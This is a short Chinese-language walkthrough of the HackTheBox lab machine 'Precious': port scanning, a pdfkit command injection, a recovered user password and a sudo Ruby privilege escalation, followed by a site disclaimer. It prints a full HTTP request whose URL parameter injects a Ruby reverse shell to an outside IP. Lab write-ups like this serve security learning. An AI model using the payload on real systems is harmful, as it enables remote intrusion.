005.Precious
1、首先nmap扫端口,扫描过程中,访问ip地址,发现重定向到了一个域名,将该域名加入host解析,再次访问
2、抓包发现服务器采用了wkhtmltopdf 0.12.6,搜索发现这个版本存在ssrf漏洞,开始复现
wkhtmltopdf SSRF | Exploit Notes
3、没办法加载远程url,然后又在返回包发现了pdfkit
4、查看pdfkit相关poc
https://github.com/shamo0/PDFkit-CMD-Injection
通过burp repeater模块复现成功
POST / HTTP/1.1
Host: precious.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
Origin: http://precious.htb
Connection: close
Referer: http://precious.htb/
Upgrade-Insecure-Requests: 1
Priority: u=0, i
url=http%3A%2F%2F10.10.16.22%3A4444%2F%3Fname%3D%2520%60+ruby+-rsocket+-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%2210.10.16.22%22%2C4444%29%29%27%60
5、经过一番搜索,在home/.bundle下面发现了henry的密码
henry:Q3c1AqGHtoI0aXAYFH
6、现在开始提权了,通过sudo -l发现,可以使用root权限运行ruby
Ruby Privilege Escalation | Exploit Notes
我们打开ruby脚本发现他是相对路径
这样的话,按照exp我们只需要创建一个名字为dependencies.yml的文件,然后使用
sudo /usr/bin/ruby /opt/update_dependencies.yml
就可以得到root权限
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)